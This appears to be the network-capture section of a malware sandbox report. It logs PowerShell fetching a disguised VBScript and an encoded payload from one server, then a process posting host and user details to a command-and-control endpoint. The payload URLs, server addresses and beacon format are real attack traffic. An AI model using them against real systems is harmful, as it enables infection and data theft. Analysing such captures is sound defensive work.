Oct 24, 2024 21:22:43.229345083 CEST	1236	IN	Data Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
Oct 24, 2024 21:22:43.229381084 CEST	1236	IN	Data Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
Oct 24, 2024 21:22:43.229415894 CEST	1236	IN	Data Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
Oct 24, 2024 21:22:43.229453087 CEST	1236	IN	Data Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
Oct 24, 2024 21:22:43.235363007 CEST	1236	IN	Data Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49167	192.3.176.141	80	4008	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:22:53.355494976 CEST	367	OUT	GET /35/educationalthingswithgreatattitudeonhere.tIF HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.176.141 Connection: Keep-Alive
Oct 24, 2024 21:22:54.029520988 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:22:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:24:03 GMT ETag: "2273e-6252e050a6f64" Accept-Ranges: bytes Content-Length: 141118 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 61 00 6d 00 6f 00 72 00 66 00 61 00 6e 00 68 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 65 00 73 00 61 00 6d 00 6f 00 72 00 74 00 69 00 7a 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 65 00 73 00 61 00 6d 00 6f 00 72 00 74 00 69 00 7a 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 [TRUNCATED] Data Ascii: private function CreateSession(wsman, conStr, optDic, amorfanhar) dim desamortizarFlags dim conOpt dim desamortizar dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword desamortizarFlags = 0 pr
Oct 24, 2024 21:22:54.029572010 CEST	1236	IN	Data Raw: 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c Data Ascii: oxyAccessType = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal
Oct 24, 2024 21:22:54.029608965 CEST	1236	IN	Data Raw: 00 66 00 20 00 4c 00 43 00 61 00 73 00 65 00 28 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 29 00 20 00 3d 00 20 00 22 00 75 00 74 00 66 00 2d 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 Data Ascii: f LCase(encodingVal) = "utf-8" then desamortizarFlags = desamortizarFlags OR wsman.SessionFlagUTF8
Oct 24, 2024 21:22:54.029643059 CEST	636	IN	Data Raw: 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 Data Ascii: f if optDic.ArgumentExists(NPARA_USESSL) then ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-
Oct 24, 2024 21:22:54.029679060 CEST	1236	IN	Data Raw: 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 4e 00 41 00 4c 00 28 00 4e 00 50 Data Ascii: ts(NPARA_AUTH) then ASSERTNAL(NPARA_AUTH) authVal = optDic.Argument(NPARA_AUTH) select case LC
Oct 24, 2024 21:22:54.029767990 CEST	1236	IN	Data Raw: 00 50 00 41 00 52 00 41 00 5f 00 50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 Data Ascii: PARA_PASSWORD & "' option is only valid for '-auth:none'" case VAL_BASIC 'Use -username and
Oct 24, 2024 21:22:54.029805899 CEST	1236	IN	Data Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 Data Ascii: ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for
Oct 24, 2024 21:22:54.029843092 CEST	1236	IN	Data Raw: 00 6f 00 73 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 64 00 65 00 73 00 61 00 6d 00 6f 00 72 00 74 00 69 00 7a 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d Data Ascii: os'" desamortizarFlags = desamortizarFlags OR wsman.SessionFlagUseKerberos case VAL_NEGOTIA
Oct 24, 2024 21:22:54.029880047 CEST	1236	IN	Data Raw: 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 2d 00 75 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 6f 00 72 00 20 00 2d 00 70 00 61 00 73 00 73 00 77 00 6f Data Ascii: '" '-username or -password must not be used ASSERTBOOL not optDic.ArgumentExists(NPARA_
Oct 24, 2024 21:22:54.029917002 CEST	1236	IN	Data Raw: 00 6c 00 61 00 67 00 20 00 27 00 22 00 20 00 26 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 20 00 26 00 20 00 22 00 27 00 20 00 68 00 61 00 73 00 20 00 61 00 6e 00 20 00 69 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 76 00 61 00 6c 00 75 Data Ascii: lag '" & authVal & "' has an invalid value." ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-"
Oct 24, 2024 21:22:54.035921097 CEST	1236	IN	Data Raw: 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 Data Ascii: end if if optDic.ArgumentExists(NPARA_USERNAME) then ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT),

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49170	192.3.176.141	80	1224	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:22.433092117 CEST	77	OUT	GET /35/SMLPERR.txt HTTP/1.1 Host: 192.3.176.141 Connection: Keep-Alive
Oct 24, 2024 21:23:23.087599039 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:23:22 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 24 Oct 2024 00:19:43 GMT ETag: "22aac-6252df5835df3" Accept-Ranges: bytes Content-Length: 141996 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087626934 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087644100 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087660074 CEST	672	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087677956 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087694883 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087703943 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087718964 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087735891 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.087775946 CEST	1060	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 24, 2024 21:23:23.093305111 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49171	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:25.852368116 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 176 Connection: close
Oct 24, 2024 21:23:25.857785940 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus116938ALBUS-PCk0DE4229FCF97F5879F50F8FD3Sii92
Oct 24, 2024 21:23:26.884572029 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49172	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:27.161587000 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 176 Connection: close
Oct 24, 2024 21:23:27.167849064 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus116938ALBUS-PC+0DE4229FCF97F5879F50F8FD3UiEbj
Oct 24, 2024 21:23:29.808551073 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49173	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:29.877360106 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 24, 2024 21:23:29.882996082 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus116938ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 24, 2024 21:23:30.931631088 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 19:23:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49174	94.156.177.220	80	1488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 21:23:31.079195023 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
